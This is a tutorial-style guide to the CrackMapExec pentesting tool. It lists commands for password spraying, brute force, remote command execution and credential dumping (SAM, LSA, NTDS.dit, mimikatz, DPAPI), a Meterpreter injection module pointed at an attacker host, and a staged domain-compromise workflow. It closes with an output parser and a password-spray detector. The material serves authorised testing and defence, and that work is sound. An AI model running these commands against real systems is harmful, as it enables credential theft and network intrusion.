
CrackMapExec Guide

Jan 20, 2025
4 min read
lawbyte

CrackMapExec (CME) is the Swiss Army knife for Windows network pentesting. It automates credential spraying, lateral movement, and post-exploitation across entire subnets in a single command.

Installation

pip install crackmapexec
# or
pip install git+https://github.com/Porchetta-Industries/CrackMapExec

# Docker
docker pull byt3bl33d3r/crackmapexec

# Verify
cme --help
crackmapexec --help # both work

Protocol Syntax

crackmapexec <protocol> <target> [options]

# Protocols: smb, winrm, ldap, mssql, ssh, ftp, rdp

SMB — Core Protocol

# Basic check (enumerate shares, signing, hostname)
crackmapexec smb 192.168.1.0/24

# Test credentials
crackmapexec smb 192.168.1.100 -u Administrator -p 'Password123'
crackmapexec smb 192.168.1.100 -u Administrator -H NT_HASH

# Credential spraying (one password, many users)
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!'

# Many passwords against one user (brute force; check the lockout threshold first)
crackmapexec smb 192.168.1.0/24 -u Administrator -p passwords.txt

# Combo file (username:password pairs)
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --no-bruteforce

# Hash spray
crackmapexec smb 192.168.1.0/24 -u users.txt -H hashes.txt

# Show only successes (green [+] lines); -F treats "[-]" literally so hostnames containing a hyphen are not dropped
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt 2>/dev/null | grep -v -F "[-]"

Shares and Files

# List shares
crackmapexec smb 192.168.1.100 -u user -p pass --shares

# List files in a share (--spider takes the share name; --pattern . matches every file)
crackmapexec smb 192.168.1.100 -u user -p pass --spider share_name --pattern .

# Spider all shares and find interesting files
crackmapexec smb 192.168.1.0/24 -u user -p pass -M spider_plus

# Read file
crackmapexec smb 192.168.1.100 -u user -p pass --get-file "\\path\\to\\file" /local/path

# Upload file
crackmapexec smb 192.168.1.100 -u user -p pass --put-file /local/file "\\remote\\path"

Command Execution

# Execute command
crackmapexec smb 192.168.1.100 -u Administrator -p pass -x "whoami"

# PowerShell execution
crackmapexec smb 192.168.1.100 -u Administrator -p pass -X "Get-Process"

# Execute on all hosts in subnet
crackmapexec smb 192.168.1.0/24 -u Administrator -p pass -x "ipconfig"

# Exec method (wmiexec, smbexec, atexec, mmcexec)
crackmapexec smb 192.168.1.100 -u admin -p pass -x "cmd" --exec-method wmiexec

Credential Dumping

# SAM database (local hashes)
crackmapexec smb 192.168.1.100 -u admin -p pass --sam

# LSA secrets
crackmapexec smb 192.168.1.100 -u admin -p pass --lsa

# NTDS.dit (domain controller — all domain hashes)
crackmapexec smb DC_IP -u admin -p pass --ntds

# NTDS with each account's pwdLastSet timestamp (spot stale accounts); extraction method is --ntds drsuapi (default) or --ntds vss
crackmapexec smb DC_IP -u admin -p pass --ntds --ntds-pwdLastSet

# LSASS (Mimikatz module)
crackmapexec smb 192.168.1.100 -u admin -p pass -M mimikatz

# dpapi (browser passwords, wifi passwords)
crackmapexec smb 192.168.1.100 -u admin -p pass -M dpapi

Modules

# List available modules
crackmapexec smb -L

# Run a module
crackmapexec smb 192.168.1.100 -u admin -p pass -M <module_name>

# Module options
crackmapexec smb 192.168.1.100 -u admin -p pass -M module_name -o KEY=value

Useful Modules

# Assorted modules (AV detection, network connections, WebDAV, payload delivery); see -L for the full list
crackmapexec smb 192.168.1.100 -u admin -p pass -M enum_av # AV detection
crackmapexec smb 192.168.1.100 -u admin -p pass -M get_netconnections
crackmapexec smb 192.168.1.100 -u admin -p pass -M ioxidresolver
crackmapexec smb 192.168.1.100 -u admin -p pass -M webdav # check webdav
crackmapexec smb 192.168.1.100 -u admin -p pass -M drop-sc # drop shortcut for hash capture
crackmapexec smb 192.168.1.100 -u admin -p pass -M empire_exec -o LISTENER=http
crackmapexec smb 192.168.1.100 -u admin -p pass -M met_inject -o LHOST=ATTACKER LPORT=4444

LDAP Protocol

# Basic LDAP enumeration
crackmapexec ldap 192.168.1.100 -u user -p pass --get-sid
crackmapexec ldap DC_IP -u user -p pass --users # enumerate users
crackmapexec ldap DC_IP -u user -p pass --groups # enumerate groups
crackmapexec ldap DC_IP -u user -p pass --computers # enumerate computers

# Password policy (for spraying safely)
crackmapexec ldap DC_IP -u user -p pass --pass-pol

# Kerberoasting via LDAP
crackmapexec ldap DC_IP -u user -p pass --kerberoasting kerberoast.txt

# AS-REP Roasting
crackmapexec ldap DC_IP -u user -p pass --asreproast asreproast.txt

WinRM Protocol

WinRM = Windows Remote Management (PowerShell Remoting):

# Test WinRM access
crackmapexec winrm 192.168.1.100 -u Administrator -p pass

# Execute command
crackmapexec winrm 192.168.1.100 -u Administrator -p pass -x "whoami"

# Interactive shell
evil-winrm -i 192.168.1.100 -u Administrator -p pass

MSSQL Protocol

# Test authentication
crackmapexec mssql 192.168.1.100 -u sa -p password

# Execute query
crackmapexec mssql 192.168.1.100 -u sa -p pass -q "SELECT @@version"

# MSSQL privilege escalation checks (impersonation, TRUSTWORTHY databases); -x below enables xp_cmdshell itself
crackmapexec mssql 192.168.1.100 -u sa -p pass -M mssql_priv

# Execute OS command
crackmapexec mssql 192.168.1.100 -u sa -p pass -x "whoami"

# Read file
crackmapexec mssql 192.168.1.100 -u sa -p pass -q "SELECT BulkColumn FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_BLOB) x"

Database — Track Findings

CME uses a SQLite database to track findings:

# View the database
cmedb

# Inside cmedb:
hosts # list all hosts
creds # list all credentials
creds add smb user pass # add credentials manually
shares # list shares

Output and Logging

# Save output to file
crackmapexec smb 192.168.1.0/24 -u admin -p pass > output.txt 2>&1

# Write a plain-text log file (alongside the terminal output and the database)
crackmapexec smb 192.168.1.0/24 -u admin -p pass --log output.log

# Filter successes ([+] lines only; -F matches the brackets literally)
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt | grep -F "[+]"
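Grepping for "[+]" or "[-]" works for a quick look, but a hostname containing a hyphen, or a `[*]` banner line, breaks the filter. The parser below is an added example (not CME's own code) that splits each status line into protocol, IP, port, hostname, status tag and message, then groups valid logins, local-admin hosts (the "Pwn3d!" marker) and hosts with SMB signing disabled; the sample output lines are constructed in the CME line format.

```python
import re

# One CME status line: protocol, ip, port, hostname, [tag], message.
LINE_RE = re.compile(
    r"^(?P<proto>[A-Z]+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<tag>[+\-*!])\]\s+(?P<msg>.*)$"
)

def parse_line(line):
    """Return a dict for a CME status line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    rec["admin"] = "(Pwn3d!)" in rec["msg"]  # CME marks local-admin access this way
    return rec

def summarize(lines):
    """Group CME output into valid logins, admin hosts, failures and unsigned SMB."""
    out = {"valid": [], "admin_hosts": [], "failed": [], "signing_off": []}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["tag"] == "+":
            cred = rec["msg"].split(" (")[0]  # strip the "(Pwn3d!)" suffix
            out["valid"].append((rec["ip"], cred))
            if rec["admin"]:
                out["admin_hosts"].append(rec["ip"])
        elif rec["tag"] == "-":
            out["failed"].append(rec["ip"])
        elif rec["tag"] == "*" and "(signing:False)" in rec["msg"]:
            out["signing_off"].append(rec["ip"])
    return out

# Constructed sample output; WS-01 contains a hyphen, which defeats grep -v "[-]".
SAMPLE = """\
SMB   192.168.1.100  445  WS-01  [*] Windows 10.0 Build 19041 x64 (name:WS-01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB   192.168.1.100  445  WS-01  [+] corp.local\\jdoe:Winter2024! (Pwn3d!)
SMB   192.168.1.101  445  DC01   [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB   192.168.1.101  445  DC01   [-] corp.local\\jdoe:Winter2024! STATUS_LOGON_FAILURE
SMB   192.168.1.102  445  FS-02  [+] corp.local\\svc_backup:Winter2024!
""".splitlines()

if __name__ == "__main__":
    for key, val in summarize(SAMPLE).items():
        print(f"{key}: {val}")
```

Pipe a saved run through it (`crackmapexec ... > output.txt`, then `summarize(open("output.txt"))`) to get a findings list without losing lines to the hyphen problem.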

Common Attack Workflow

# Step 1: Network discovery
crackmapexec smb 192.168.1.0/24

# Step 2: Password spray (check policy first!)
crackmapexec ldap DC_IP -u validuser -p password --pass-pol
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success

# Step 3: Dump creds on owned hosts
crackmapexec smb owned_hosts.txt -u admin -p pass --sam --lsa

# Step 4: Spray new credentials
crackmapexec smb 192.168.1.0/24 -u new_users.txt -H hashes.txt

# Step 5: Target DC
crackmapexec smb DC_IP -u DA_user -H DA_HASH --ntds
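From the blue-team side, Step 2 of this workflow has a distinctive footprint: one source address producing failed logons (Security event 4625) for many different accounts in a short window. The detector below is an added example, not part of the guide, and runs a sliding-window count of distinct target users per source over a constructed list of events; the field layout and thresholds are assumptions to adapt to your own log pipeline.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of failed-logon events: (ISO timestamp, source IP, target user).
EVENTS = [
    ("2025-01-20T09:00:01", "10.0.0.50", "alice"),
    ("2025-01-20T09:00:02", "10.0.0.50", "bob"),
    ("2025-01-20T09:00:03", "10.0.0.50", "carol"),
    ("2025-01-20T09:00:04", "10.0.0.50", "dave"),
    ("2025-01-20T09:00:05", "10.0.0.50", "erin"),
    ("2025-01-20T09:00:06", "10.0.0.50", "frank"),
    ("2025-01-20T09:01:00", "10.0.0.7", "jsmith"),   # one user mistyping a password
    ("2025-01-20T09:01:05", "10.0.0.7", "jsmith"),
    ("2025-01-20T09:01:10", "10.0.0.7", "jsmith"),
    ("2025-01-20T09:01:15", "10.0.0.7", "jsmith"),
    ("2025-01-20T09:30:00", "10.0.0.9", "alice"),    # two users, not a spray
    ("2025-01-20T09:31:00", "10.0.0.9", "bob"),
]

def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Return {source_ip: max distinct failed accounts seen within `window`}
    for every source that reaches min_users; repeated failures for the same
    account (lockout-style noise) do not count towards the threshold."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((datetime.fromisoformat(ts), user))
    alerts = {}
    for src, items in by_src.items():
        items.sort()
        lo = 0
        for hi in range(len(items)):
            # Slide the left edge until the window fits [lo, hi].
            while items[hi][0] - items[lo][0] > window:
                lo += 1
            distinct = {u for _, u in items[lo:hi + 1]}
            if len(distinct) >= min_users:
                alerts[src] = max(len(distinct), alerts.get(src, 0))
    return alerts

if __name__ == "__main__":
    for src, n in detect_spray(EVENTS).items():
        print(f"possible password spray from {src}: {n} accounts failed")
```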
